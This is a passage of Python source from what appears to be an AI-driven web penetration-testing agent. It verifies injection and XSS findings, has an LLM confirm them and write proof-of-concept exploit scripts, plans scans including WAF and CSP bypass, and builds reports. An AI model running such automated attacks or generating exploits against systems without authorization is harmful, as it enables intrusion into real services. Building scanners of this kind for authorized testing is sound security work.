changed significantly ({diff} chars) - possible boolean-based SQLi" elif vuln_type == "xss": # Check if payload is reflected without encoding payload_lower = payload.lower() if payload in body_original or payload.lower() in body: # Verify it's in a dangerous context if ') if '<' in payload and '<' in body_original and '<' not in body_original: # Check if our specific tag made it through for tag in [' bool: """Use AI to confirm finding and reduce false positives""" # If LLM not available, trust the technical verification if not self.llm.is_available(): await self.log("debug", f" LLM not available, trusting technical verification for {vuln_type}") return True prompt = f"""Analyze this potential {vuln_type.upper()} vulnerability and determine if it's REAL or a FALSE POSITIVE. **Target Information:** - URL: {url} - Vulnerable Parameter: {param} - Payload Used: {payload} - Evidence Found: {evidence} **Response Excerpt:** ``` {response[:1500]} ``` **Vulnerability-Specific Analysis Required:** For {vuln_type.upper()}, confirm ONLY if: {"- The injected SQL syntax causes a database error OR returns different data than normal input" if vuln_type == "sqli" else ""} {"- The JavaScript payload appears UNESCAPED in the response body (not just reflected)" if vuln_type == "xss" else ""} {"- The file content (e.g., /etc/passwd, win.ini) appears in the response" if vuln_type == "lfi" else ""} {"- The template expression was EVALUATED (e.g., 7*7 became 49, not {{7*7}})" if vuln_type == "ssti" else ""} {"- Internal/cloud resources were accessed (metadata, localhost content)" if vuln_type == "ssrf" else ""} {"- Command output (uid=, gid=, directory listing) appears in response" if vuln_type == "rce" else ""} **Critical Questions:** 1. Does the evidence show the vulnerability being EXPLOITED, not just reflected? 2. Is there definitive proof of unsafe processing? 3. 
Could this evidence be normal application behavior or sanitized output? **IMPORTANT:** Be conservative. Many scanners report false positives. Only confirm if you see CLEAR exploitation evidence. Respond with exactly one of: - "CONFIRMED: [brief explanation of why this is definitely exploitable]" - "FALSE_POSITIVE: [brief explanation of why this is not a real vulnerability]" """ try: response = await self.llm.generate(prompt, "You are a senior penetration tester reviewing vulnerability findings. Be extremely strict - false positives waste client time and damage credibility. Only confirm findings with definitive exploitation evidence.") return "CONFIRMED" in response.upper() except: # If AI fails, trust the technical verification return True def _create_finding(self, vuln_type: str, url: str, param: str, payload: str, evidence: str, response: Dict) -> Finding: """Create a finding object with full technical details""" severity = self._get_severity(vuln_type) finding_id = hashlib.md5(f"{vuln_type}{url}{param}".encode()).hexdigest()[:8] parsed = urlparse(url) path = parsed.path or '/' # Build a more realistic HTTP request representation full_url = response.get('url', url) method = response.get('method', 'GET') status = response.get('status', 200) http_request = f"""{method} {path}?{param}={payload} HTTP/1.1 Host: {parsed.netloc} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close""" # Format response excerpt response_body = response.get('body', '')[:1000] http_response = f"""HTTP/1.1 {status} OK Content-Type: {response.get('content_type', 'text/html')} {response_body}""" return Finding( id=finding_id, title=f"{vuln_type.upper()} in {path}", severity=severity, vulnerability_type=vuln_type, cvss_score=self._get_cvss_score(vuln_type), cvss_vector=self._get_cvss_vector(vuln_type), affected_endpoint=full_url, parameter=param, payload=payload, evidence=evidence, response=http_response, request=http_request, ai_verified=self.llm.is_available(), confidence="high" if self.llm.is_available() else "medium" ) def _get_cvss_vector(self, vuln_type: str) -> str: """Get CVSS 3.1 vector string for vulnerability type""" vectors = { "rce": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "sqli": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "ssti": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "lfi": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "ssrf": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "xss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "idor": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "open_redirect": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", } return vectors.get(vuln_type, "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N") def _get_severity(self, vuln_type: str) -> str: """Get severity for vulnerability type""" return { "rce": "critical", "sqli": "critical", "ssti": "critical", "lfi": "high", "ssrf": "high", "xss": "high", "idor": "medium", "open_redirect": "medium", }.get(vuln_type, "medium") def _get_cvss_score(self, vuln_type: str) -> float: """Get CVSS score for vulnerability type""" return { "rce": 9.8, "sqli": 9.1, "ssti": 9.1, "lfi": 7.5, "ssrf": 7.5, "xss": 6.1, "idor": 5.3, "open_redirect": 4.3, }.get(vuln_type, 5.0) # ==================== AI ENHANCEMENT ==================== async def _ai_enhance_findings(self): """Enhance findings with AI-generated details""" if not self.llm.is_available(): await self.log("info", " Skipping AI 
enhancement (LLM not available)") return for finding in self.findings: await self.log("info", f" Enhancing: {finding.title}") enhanced = await self._enhance_single_finding(finding) finding.cwe_id = enhanced.get("cwe_id", "") finding.description = enhanced.get("description", "") finding.impact = enhanced.get("impact", "") finding.poc_code = enhanced.get("poc_code", "") finding.remediation = enhanced.get("remediation", "") finding.references = enhanced.get("references", []) if enhanced.get("cvss_score"): finding.cvss_score = enhanced["cvss_score"] if enhanced.get("cvss_vector"): finding.cvss_vector = enhanced["cvss_vector"] async def _enhance_single_finding(self, finding: Finding) -> Dict: """AI enhancement for single finding""" prompt = f"""Generate comprehensive details for this confirmed security vulnerability to include in a professional penetration testing report. **Vulnerability Details:** - Type: {finding.vulnerability_type.upper()} - Title: {finding.title} - Affected Endpoint: {finding.affected_endpoint} - Vulnerable Parameter: {finding.parameter} - Payload Used: {finding.payload} - Evidence: {finding.evidence} **Required Output:** 1. **CVSS 3.1 Score:** Calculate accurately based on: - Attack Vector (AV): Network (most web vulns) - Attack Complexity (AC): Low/High based on prerequisites - Privileges Required (PR): None/Low/High - User Interaction (UI): None/Required - Scope (S): Unchanged/Changed - Impact: Confidentiality/Integrity/Availability 2. **CWE ID:** Provide the MOST SPECIFIC CWE for this vulnerability type: - SQL Injection: CWE-89 (or CWE-564 for Hibernate) - XSS Reflected: CWE-79, Stored: CWE-79 - LFI: CWE-22 or CWE-98 - SSTI: CWE-94 or CWE-1336 - SSRF: CWE-918 - RCE: CWE-78 (OS Command) or CWE-94 (Code Injection) 3. **Description:** Write 2-3 paragraphs explaining: - What the vulnerability is and how it was discovered - Technical details of how the exploitation works - The specific context in this application 4. **Impact:** Describe REALISTIC business and technical impact: - What data/systems could be compromised? - What's the worst-case scenario? - Compliance implications (PCI-DSS, GDPR, etc.) 5. **Proof of Concept:** Working Python script that: - Uses the requests library - Demonstrates the vulnerability - Includes comments explaining each step 6. **Remediation:** Specific, actionable steps: - Code-level fixes (with examples) - Framework/library recommendations - Defense-in-depth measures 7. **References:** Include links to: - OWASP guidance - CWE/CVE if applicable - Vendor documentation Respond in JSON format: {{ "cvss_score": 8.5, "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "cwe_id": "CWE-89", "description": "A SQL injection vulnerability...", "impact": "An attacker could...", "poc_code": "import requests\\n\\n# PoC for SQL Injection\\n...", "remediation": "1. Use parameterized queries...\\n2. Implement input validation...", "references": ["https://owasp.org/Top10/A03_2021-Injection/", "https://cwe.mitre.org/data/definitions/89.html"] }}""" try: response = await self.llm.generate(prompt, "You are a senior penetration tester writing findings for an enterprise client. Be thorough, accurate, and professional. 
The report will be reviewed by security teams and executives.") match = re.search(r'\{.*\}', response, re.DOTALL) if match: return json.loads(match.group()) except Exception as e: await self.log("debug", f"AI enhance error: {e}") return {} # ==================== PROMPT-ONLY MODE ==================== async def _run_prompt_only(self) -> Dict: """Prompt-only mode - AI decides everything""" await self.log("warning", "PROMPT-ONLY MODE: AI will decide what tools to use") await self.log("warning", "This mode uses more tokens than other modes") await self._update_progress(0, "AI Planning") prompt = self.custom_prompt or (self.task.prompt if hasattr(self.task, 'prompt') else "") if not prompt: prompt = "Perform a comprehensive security assessment" # Phase 1: AI Planning await self.log("info", "[PHASE 1/4] AI Planning") plan = await self._ai_create_plan(prompt) await self._update_progress(25, "Plan created") # Phase 2: Execute Plan await self.log("info", "[PHASE 2/4] Executing Plan") for step in plan.get("steps", ["recon", "test", "report"]): await self.log("info", f" Executing: {step}") await self._execute_plan_step(step) await self._update_progress(70, "Plan executed") # Phase 3: Analyze Results await self.log("info", "[PHASE 3/4] Analyzing Results") await self._ai_enhance_findings() await self._update_progress(85, "Analysis complete") # Phase 4: Generate Report await self.log("info", "[PHASE 4/4] Generating Report") report = await self._generate_full_report() await self._update_progress(100, "Complete") return report async def _ai_create_plan(self, prompt: str) -> Dict: """AI creates execution plan""" if not self.llm.is_available(): return {"steps": ["recon", "test", "report"]} system = """You are an autonomous penetration testing agent. Your role is to: 1. Understand the user's security testing request 2. Create an efficient, targeted testing plan 3. Ensure thorough coverage while avoiding redundant testing Always start with reconnaissance unless already done, and always end with report generation.""" plan_prompt = f"""**Security Testing Request:** User Request: {prompt} Target: {self.target} **Available Actions (predefined):** - recon: Discover endpoints, parameters, forms, and technologies - scan_sqli: Test for SQL injection - scan_xss: Test for Cross-Site Scripting - scan_lfi: Test for Local File Inclusion / Path Traversal - scan_ssti: Test for Server-Side Template Injection - scan_ssrf: Test for Server-Side Request Forgery - clickjacking: Test for Clickjacking - security_headers: Test security headers - cors: Test for CORS misconfigurations - scan_all: Comprehensive vulnerability testing - report: Generate final assessment report **IMPORTANT: You can also use ANY custom vulnerability type as a step!** For vulnerabilities not in the predefined list, just use the vulnerability name as the step. The AI will dynamically generate tests for it. 
Examples of custom steps you can use: - "xxe" - XML External Entity injection - "race_condition" - Race condition testing - "rate_limit_bypass" - Rate limiting bypass - "jwt_vulnerabilities" - JWT security issues - "bola" - Broken Object Level Authorization - "bfla" - Broken Function Level Authorization - "graphql_injection" - GraphQL specific attacks - "nosql_injection" - NoSQL injection - "waf_bypass" - WAF bypass techniques - "csp_bypass" - CSP bypass techniques - "prototype_pollution" - Prototype pollution - "deserialization" - Insecure deserialization - "mass_assignment" - Mass assignment vulnerabilities - "business_logic" - Business logic flaws - Any other vulnerability type you can think of! **Planning Guidelines:** 1. Start with 'recon' to gather information 2. Add steps based on user request - use predefined OR custom vulnerability names 3. Always end with 'report' **Examples:** - "Test for XXE" → {{"steps": ["recon", "xxe", "report"]}} - "Check race conditions and rate limiting" → {{"steps": ["recon", "race_condition", "rate_limit_bypass", "report"]}} - "Test BOLA and BFLA" → {{"steps": ["recon", "bola", "bfla", "report"]}} - "Full API security test" → {{"steps": ["recon", "bola", "bfla", "jwt_vulnerabilities", "mass_assignment", "report"]}} - "WAF bypass and XSS" → {{"steps": ["recon", "waf_bypass", "scan_xss", "report"]}} Respond with your execution plan in JSON format: {{"steps": ["action1", "action2", ...]}}""" try: response = await self.llm.generate(plan_prompt, system) match = re.search(r'\{.*\}', response, re.DOTALL) if match: return json.loads(match.group()) except: pass # Fallback: parse prompt keywords to determine steps # This fallback now supports ANY vulnerability type via AI dynamic testing prompt_lower = prompt.lower() steps = ["recon"] # Known vulnerability mappings vuln_mappings = { # Predefined tests "clickjack": "clickjacking", "x-frame": "clickjacking", "framing": "clickjacking", "security header": "security_headers", "cors": "cors", "sqli": "scan_sqli", "sql injection": "scan_sqli", "xss": "scan_xss", "cross-site script": "scan_xss", "lfi": "scan_lfi", "file inclusion": "scan_lfi", "path traversal": "scan_lfi", "ssti": "scan_ssti", "template injection": "scan_ssti", "ssrf": "scan_ssrf", # Advanced vulnerabilities - will use AI dynamic testing "xxe": "xxe", "xml external": "xxe", "race condition": "race_condition", "race": "race_condition", "rate limit": "rate_limit_bypass", "rate-limit": "rate_limit_bypass", "bola": "bola", "broken object": "bola", "bfla": "bfla", "broken function": "bfla", "idor": "idor", "insecure direct": "idor", "jwt": "jwt_vulnerabilities", "graphql": "graphql_injection", "nosql": "nosql_injection", "waf bypass": "waf_bypass", "waf": "waf_bypass", "csp bypass": "csp_bypass", "prototype pollution": "prototype_pollution", "deserialization": "deserialization", "deserial": "deserialization", "mass assignment": "mass_assignment", "business logic": "business_logic", "open redirect": "open_redirect", "subdomain takeover": "subdomain_takeover", "host header": "host_header_injection", "cache poison": "cache_poisoning", "http smuggling": "http_smuggling", "request smuggling": "http_smuggling", "web cache": "cache_poisoning", "parameter pollution": "parameter_pollution", "hpp": "parameter_pollution", "type juggling": "type_juggling", "timing attack": "timing_attack", "command injection": "command_injection", "rce": "command_injection", } matched_steps = set() for keyword, step in vuln_mappings.items(): if keyword in prompt_lower: 
matched_steps.add(step) if matched_steps: steps.extend(list(matched_steps)) else: # No known keywords matched - pass the entire prompt as a custom step # The AI dynamic testing will handle it custom_step = prompt.strip()[:100] # Limit length if custom_step and custom_step.lower() not in ["test", "scan", "check", "find"]: steps.append(custom_step) else: steps.append("scan_all") steps.append("report") return {"steps": steps} async def _execute_plan_step(self, step: str): """Execute a plan step - supports ANY vulnerability type via AI dynamic testing""" step_lower = step.lower() await self.log("debug", f"Executing plan step: {step}") # Known vulnerability types with predefined tests if "recon" in step_lower or "information" in step_lower or "discovery" in step_lower: await self._run_recon_only() elif "scan_all" in step_lower: await self._test_all_vulnerabilities(self._default_attack_plan()) elif "sqli" in step_lower or "sql injection" in step_lower: await self._test_all_vulnerabilities({"priority_vulns": ["sqli"]}) elif "xss" in step_lower or "cross-site script" in step_lower: await self._test_all_vulnerabilities({"priority_vulns": ["xss"]}) elif "lfi" in step_lower or "local file" in step_lower or "path traversal" in step_lower: await self._test_all_vulnerabilities({"priority_vulns": ["lfi"]}) elif "ssti" in step_lower or "template injection" in step_lower: await self._test_all_vulnerabilities({"priority_vulns": ["ssti"]}) elif "ssrf" in step_lower or "server-side request" in step_lower: await self._test_all_vulnerabilities({"priority_vulns": ["ssrf"]}) elif "clickjack" in step_lower or "x-frame" in step_lower or "framing" in step_lower: await self.log("info", " Testing for clickjacking/X-Frame-Options") await self._test_security_headers("clickjacking") elif "security_header" in step_lower or ("header" in step_lower and "security" in step_lower): await self.log("info", " Testing security headers") await self._test_security_headers("all") elif "cors" in step_lower: await self.log("info", " Testing CORS configuration") await self._test_cors() elif "info_disclos" in step_lower or ("information" in step_lower and "disclosure" in step_lower): await self.log("info", " Testing for information disclosure") await self._test_information_disclosure() elif "report" in step_lower or "document" in step_lower: await self.log("info", " Report will be generated at the end") else: # AI DYNAMIC TESTING - handles ANY vulnerability type! # Examples: XXE, Race Condition, Rate Limiting, BOLA, BFLA, JWT, GraphQL, # NoSQL Injection, WAF Bypass, CSP Bypass, Prototype Pollution, etc. 
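# Any unrecognized step (a free-form vulnerability name or whole user prompt) is handed to _ai_dynamic_test, which uses the LLM to generate tests for it.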
await self.log("info", f" [AI] Dynamic testing for: {step}") await self._ai_dynamic_test(step) # ==================== ANALYZE-ONLY MODE ==================== async def _run_analyze_only(self) -> Dict: """Analyze-only mode""" await self.log("info", "ANALYZE-ONLY MODE: No active testing") await self._update_progress(0, "Starting analysis") # Load any provided context if self.recon_context: await self.log("info", "[PHASE 1/2] Loading context") self._load_context() else: await self.log("info", "[PHASE 1/2] Passive reconnaissance") await self._initial_probe() await self._update_progress(50, "Context loaded") # AI Analysis await self.log("info", "[PHASE 2/2] AI Analysis") analysis = await self._ai_passive_analysis() await self._update_progress(100, "Analysis complete") return { "type": "analysis_only", "target": self.target, "mode": self.mode.value, "scan_date": datetime.utcnow().isoformat(), "analysis": analysis, "recon": { "endpoints": len(self.recon.endpoints), "technologies": self.recon.technologies }, "findings": [], "recommendations": ["Perform active testing for complete assessment"] } def _load_context(self): """Load recon context""" if not self.recon_context: return data = self.recon_context.get("data", {}) self.recon.endpoints = [{"url": e} for e in data.get("endpoints", [])] self.recon.technologies = data.get("technologies", []) async def _ai_passive_analysis(self) -> str: """AI passive analysis""" if not self.llm.is_available(): return "LLM not available for analysis" context = f"""Target: {self.target} Endpoints: {[_get_endpoint_url(e) for e in self.recon.endpoints[:20]]} Technologies: {self.recon.technologies} Forms: {len(self.recon.forms)}""" prompt = f"""Perform a security analysis WITHOUT active testing: {context} Analyze and identify: 1. Potential security risks 2. Areas requiring testing 3. Technology-specific concerns 4. Recommendations Provide your analysis:""" try: return await self.llm.generate(prompt, "You are a security analyst. 
Analyze without active testing.") except: return "Analysis failed" # ==================== REPORT GENERATION ==================== def _generate_recon_report(self) -> Dict: """Generate recon report""" return { "type": "reconnaissance", "target": self.target, "mode": self.mode.value, "scan_date": datetime.utcnow().isoformat(), "summary": { "target": self.target, "endpoints_found": len(self.recon.endpoints), "forms_found": len(self.recon.forms), "technologies": self.recon.technologies, }, "data": { "endpoints": self.recon.endpoints[:50], "forms": self.recon.forms[:20], "technologies": self.recon.technologies, "api_endpoints": self.recon.api_endpoints[:20], }, "findings": [], "recommendations": ["Proceed with vulnerability testing"] } async def _generate_full_report(self) -> Dict: """Generate comprehensive report""" # Convert findings to dict findings_data = [] for f in self.findings: findings_data.append({ "id": f.id, "title": f.title, "severity": f.severity, "vulnerability_type": f.vulnerability_type, "cvss_score": f.cvss_score, "cvss_vector": f.cvss_vector, "cwe_id": f.cwe_id, "description": f.description, "affected_endpoint": f.affected_endpoint, "parameter": f.parameter, "payload": f.payload, "evidence": f.evidence, "impact": f.impact, "poc_code": f.poc_code, "remediation": f.remediation, "references": f.references, "ai_verified": f.ai_verified, "confidence": f.confidence, }) # Count by severity severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0} for f in self.findings: severity_counts[f.severity] = severity_counts.get(f.severity, 0) + 1 # Generate recommendations recommendations = self._generate_recommendations() report = { "type": "full_assessment", "target": self.target, "mode": self.mode.value, "scan_date": datetime.utcnow().isoformat(), "duration": "N/A", "summary": { "target": self.target, "mode": self.mode.value, "total_findings": len(self.findings), "severity_breakdown": severity_counts, "endpoints_tested": len(self.recon.endpoints), "technologies": self.recon.technologies, "risk_level": self._calculate_risk_level(severity_counts), }, "findings": findings_data, "recommendations": recommendations, "executive_summary": await self._generate_executive_summary(findings_data, severity_counts) } # Log summary await self.log("info", "=" * 60) await self.log("info", "ASSESSMENT COMPLETE") await self.log("info", f"Total Findings: {len(self.findings)}") await self.log("info", f" Critical: {severity_counts['critical']}") await self.log("info", f" High: {severity_counts['high']}") await self.log("info", f" Medium: {severity_counts['medium']}") await self.log("info", f" Low: {severity_counts['low']}") await self.log("info", "=" * 60) return report async def _generate_executive_summary(self, findings: List, counts: Dict) -> str: """Generate executive summary""" if not self.llm.is_available() or not findings: if counts.get('critical', 0) > 0: return f"Critical vulnerabilities found requiring immediate attention. {counts['critical']} critical and {counts['high']} high severity issues identified." elif counts.get('high', 0) > 0: return f"High severity vulnerabilities found. {counts['high']} high severity issues require prompt remediation." else: return "Assessment completed. Review findings and implement recommended security improvements." 
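# With an LLM available, condense the top findings and overall risk level into a prompt and request a short, executive-level narrative.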
# Build finding summary for context finding_summary = [] for f in findings[:5]: finding_summary.append(f"- [{f.get('severity', 'unknown').upper()}] {f.get('title', 'Unknown')}") risk_level = self._calculate_risk_level(counts) prompt = f"""Generate a professional executive summary for this penetration testing report. **Assessment Overview:** - Target: {self.target} - Assessment Type: Automated Security Assessment - Overall Risk Rating: {risk_level} **Findings Summary:** - Total Vulnerabilities: {len(findings)} - Critical: {counts.get('critical', 0)} - High: {counts.get('high', 0)} - Medium: {counts.get('medium', 0)} - Low: {counts.get('low', 0)} - Informational: {counts.get('info', 0)} **Key Findings:** {chr(10).join(finding_summary) if finding_summary else '- No significant vulnerabilities identified'} **Required Output:** Write a 3-4 sentence executive summary that: 1. States the overall security posture (good/needs improvement/critical issues) 2. Highlights the most important finding(s) and their business impact 3. Provides a clear call to action for remediation Write in a professional, non-technical tone suitable for C-level executives and board members.""" try: return await self.llm.generate(prompt, "You are a senior security consultant presenting findings to executive leadership. Be concise, professional, and focus on business impact rather than technical details.") except: return "Assessment completed. Review findings for details." def _calculate_risk_level(self, counts: Dict) -> str: """Calculate overall risk level""" if counts.get("critical", 0) > 0: return "CRITICAL" elif counts.get("high", 0) > 0: return "HIGH" elif counts.get("medium", 0) > 0: return "MEDIUM" elif counts.get("low", 0) > 0: return "LOW" return "INFO" def _generate_recommendations(self) -> List[str]: """Generate recommendations""" recommendations = [] vuln_types = set(f.vulnerability_type for f in self.findings) if "sqli" in vuln_types: recommendations.append("Implement parameterized queries/prepared statements to prevent SQL injection") if "xss" in vuln_types: recommendations.append("Implement output encoding and Content Security Policy (CSP) headers") if "lfi" in vuln_types: recommendations.append("Validate and sanitize all file path inputs; implement allowlists") if "ssti" in vuln_types: recommendations.append("Use logic-less templates or properly sandbox template engines") if "ssrf" in vuln_types: recommendations.append("Validate and restrict outbound requests; use allowlists for URLs") if "rce" in vuln_types: recommendations.append("Avoid executing user input; use safe APIs instead of system commands") if not recommendations: recommendations.append("Continue regular security assessments and penetration testing") recommendations.append("Implement security headers (CSP, X-Frame-Options, etc.)") recommendations.append("Keep all software and dependencies up to date") return recommendations def _generate_error_report(self, error: str) -> Dict: """Generate error report""" return { "type": "error", "target": self.target, "mode": self.mode.value, "error": error, "findings": [], "summary": {"error": error} }
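# ---------------------------------------------------------------------------
# Illustrative sketch only (not called by the agent): what the "parameterized
# queries/prepared statements" remediation recommended above looks like in
# practice, using the standard-library sqlite3 module. The table and column
# names below are hypothetical examples.
import sqlite3

def find_user_vulnerable(conn: sqlite3.Connection, username: str):
    # String concatenation lets input such as "' OR '1'='1" rewrite the query.
    return conn.execute(
        "SELECT id, email FROM users WHERE username = '" + username + "'"
    ).fetchall()

def find_user_safe(conn: sqlite3.Connection, username: str):
    # Placeholder binding keeps user input as data, never as SQL syntax.
    return conn.execute(
        "SELECT id, email FROM users WHERE username = ?", (username,)
    ).fetchall()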